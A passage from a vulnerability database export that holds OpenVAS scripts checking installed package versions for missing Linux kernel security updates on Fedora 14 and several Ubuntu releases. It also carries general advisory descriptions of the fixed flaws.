script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-October/067409.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.863571\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2011-12874\");\n script_cve_id(\"CVE-2011-2918\", \"CVE-2011-3188\", \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\", \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-12874\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC14\");\n script_tag(name:\"affected\", value:\"kernel on Fedora 14\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~97.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-25T10:55:37", "description": "Check for the Version of kernel", "cvss3": {}, "published": "2011-10-10T00:00:00", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2011-12874", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904", "CVE-2011-2918", "CVE-2010-4073", "CVE-2011-3188", "CVE-2010-4668", "CVE-2010-4072", "CVE-2011-1746", "CVE-2011-2723", "CVE-2011-1494", "CVE-2011-2517", "CVE-2011-2928", "CVE-2010-2963", "CVE-2011-2699", "CVE-2010-3698", "CVE-2011-1770", "CVE-2011-1495", "CVE-2011-1833", "CVE-2010-3880", "CVE-2011-2905", "CVE-2011-2497", "CVE-2011-2695", "CVE-2010-2962", "CVE-2011-1745", "CVE-2011-3191"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:863571", "href": "http://plugins.openvas.org/nasl.php?oid=863571", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2011-12874\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"kernel on Fedora 14\";\ntag_insight = \"The kernel package contains the Linux kernel (vmlinuz), the core of any\n Linux operating system. The kernel handles the basic functions\n of the operating system: memory allocation, process allocation, device\n input and output, etc.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-October/067409.html\");\n script_id(863571);\n script_version(\"$Revision: 6626 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:30:10 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-10 16:05:48 +0200 (Mon, 10 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2011-12874\");\n script_cve_id(\"CVE-2011-2918\", \"CVE-2011-3188\", \"CVE-2011-2723\", \"CVE-2011-2928\", \"CVE-2011-3191\", \"CVE-2011-1833\", \"CVE-2011-2905\", \"CVE-2011-2695\", \"CVE-2011-2497\", \"CVE-2011-2517\", \"CVE-2011-2699\", \"CVE-2011-1770\", \"CVE-2011-1494\", \"CVE-2011-1495\", \"CVE-2011-1745\", \"CVE-2011-1746\", \"CVE-2010-4668\", \"CVE-2010-4073\", \"CVE-2010-4072\", \"CVE-2010-3880\", \"CVE-2010-2962\", \"CVE-2010-3698\", \"CVE-2010-2963\", \"CVE-2010-3904\");\n script_name(\"Fedora Update for kernel FEDORA-2011-12874\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC14\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.35.14~97.fc14\", rls:\"FC14\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:54:47", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1000-1", "cvss3": {}, "published": "2010-10-22T00:00:00", "type": "openvas", "title": "Ubuntu Update for Linux kernel vulnerabilities USN-1000-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2942", "CVE-2010-3904", "CVE-2010-3078", "CVE-2010-2066", "CVE-2010-2248", "CVE-2010-2226", "CVE-2010-2960", "CVE-2010-2955", "CVE-2010-2946", "CVE-2009-4895", "CVE-2010-3437", "CVE-2010-2521", "CVE-2010-3477", "CVE-2010-3310", "CVE-2010-2963", "CVE-2010-2524", "CVE-2010-2478", "CVE-2010-3015", "CVE-2010-2495", "CVE-2010-3442", "CVE-2010-3705", "CVE-2010-2954", "CVE-2010-3067", "CVE-2010-3084", "CVE-2010-2798", "CVE-2010-3080", "CVE-2010-3432"], "modified": "2017-12-25T00:00:00", "id": "OPENVAS:1361412562310840523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840523", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1000_1.nasl 8244 2017-12-25 07:29:28Z teissa $\n#\n# Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Joel Becker discovered that OCFS2 did not correctly validate on-disk\n symlink structures. If an attacker were able to trick a user or automated\n system into mounting a specially crafted filesystem, it could crash the\n system or exposde kernel memory, leading to a loss of privacy. (Ubuntu\n 6.06 LTS, 8.04 LTS, and 9.04 were not affected.)\n\n Al Viro discovered a race condition in the TTY driver. A local attacker\n could exploit this to crash the system, leading to a denial of service.\n (Only Ubuntu 9.04 and 9.10 were affected.) (CVE-2009-4895)\n \n Dan Rosenberg discovered that the MOVE_EXT ext4 ioctl did not correctly\n check file permissions. A local attacker could overwrite append-only\n files, leading to potential data loss. (Only Ubuntu 9.10 was affected.)\n (CVE-2010-2066)\n \n Dan Rosenberg discovered that the swapexit xfs ioctl did not correctly\n check file permissions. A local attacker could exploit this to read from\n write-only files, leading to a loss of privacy. (Only Ubuntu 8.04 LTS,\n 9.04, and 9.10 were affected.) (CVE-2010-2226)\n \n Suresh Jayaraman discovered that CIFS did not correctly validate certain\n response packats. A remote attacker could send specially crafted traffic\n that would crash the system, leading to a denial of service. (Ubuntu\n 10.04 LTS and 10.10 were not affected.) (CVE-2010-2248)\n \n Ben Hutchings discovered that the ethtool interface did not correctly\n check certain sizes. A local attacker could perform malicious ioctl calls\n that could crash the system, leading to a denial of service. (Only Ubuntu\n 9.10 and 10.04 LTS were affected.) (CVE-2010-2478, CVE-2010-3084)\n \n James Chapman discovered that L2TP did not correctly evaluate checksum\n capabilities. If an attacker could make malicious routing changes, they\n could crash the system, leading to a denial of service. (Only Ubuntu\n 9.10 was affected.) (CVE-2010-2495)\n \n Neil Brown discovered that NFSv4 did not correctly check certain write\n requests. A remote attacker could send specially crafted traffic that\n could crash the system or possibly gain root privileges. (Ubuntu 10.04\n LTS and 10.10 were not affected.) (CVE-2010-2521)\n \n David Howells discovered that DNS resolution in CIFS could be spoofed. A\n local attacker could exploit this to control DNS replies, leading to\n a loss of privacy and possible privilege escalation. (Only Ubuntu 9.10\n was affected.) (CVE-2010-2524)\n \n Bob Peterson discovered that GFS2 rename operations did not correctly\n validate certain sizes. A local a ... \n\n Description truncated, for more information please check the Reference URL\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\";\n\ntag_affected = \"Linux kernel vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 9.04 ,\n Ubuntu 9.10 ,\n Ubuntu 10.04 LTS\";\n\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1000-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840523\");\n script_version(\"$Revision: 8244 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-25 08:29:28 +0100 (Mon, 25 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-22 16:42:09 +0200 (Fri, 22 Oct 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1000-1\");\n script_cve_id(\"CVE-2009-4895\", \"CVE-2010-2066\", \"CVE-2010-2226\", \"CVE-2010-2248\", \"CVE-2010-2478\", \"CVE-2010-2495\", \"CVE-2010-2521\", \"CVE-2010-2524\", \"CVE-2010-2798\", \"CVE-2010-2942\", \"CVE-2010-2946\", \"CVE-2010-2954\", \"CVE-2010-2955\", \"CVE-2010-2960\", \"CVE-2010-2963\", \"CVE-2010-3015\", \"CVE-2010-3067\", \"CVE-2010-3078\", \"CVE-2010-3080\", \"CVE-2010-3084\", \"CVE-2010-3310\", \"CVE-2010-3432\", \"CVE-2010-3437\", \"CVE-2010-3442\", \"CVE-2010-3477\", \"CVE-2010-3705\", \"CVE-2010-3904\");\n script_name(\"Ubuntu Update for Linux kernel vulnerabilities USN-1000-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307-ec2\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-307-ec2\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-386\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic-pae\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22-generic\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-386\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic-pae\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-generic\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.31-22-virtual\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-doc\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-ec2-source-2.6.31\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-307\", ver:\"2.6.31-307.21\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.31-22\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.31\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"block-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"char-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crypto-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fs-secondary-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"kernel-image-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"md-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"message-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"mouse-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nfs-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-shared-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"nic-usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"parport-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"pcmcia-storage-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"plip-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ppp-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"sata-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"scsi-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"serial-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"storage-core-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"usb-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"virtio-modules-2.6.31-22-generic-di\", ver:\"2.6.31-22.67\", rls:\"UBUNTU9.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-386\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-686\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-k7\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55-server\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-headers-2.6.15-55\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-386\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-686\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-k7\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server-bigiron\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-2.6.15-55-server\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-doc-2.6.15\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-kernel-devel\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-source-2.6.15\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"acpi-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"cdrom-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"crc-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext2-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ext3-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fat-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"fb-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"firewire-core-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"floppy-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ide-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"input-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ipv6-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"irda-modules-2.6.15-55-386-di\", ver:\"2.6.15-55.89\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n 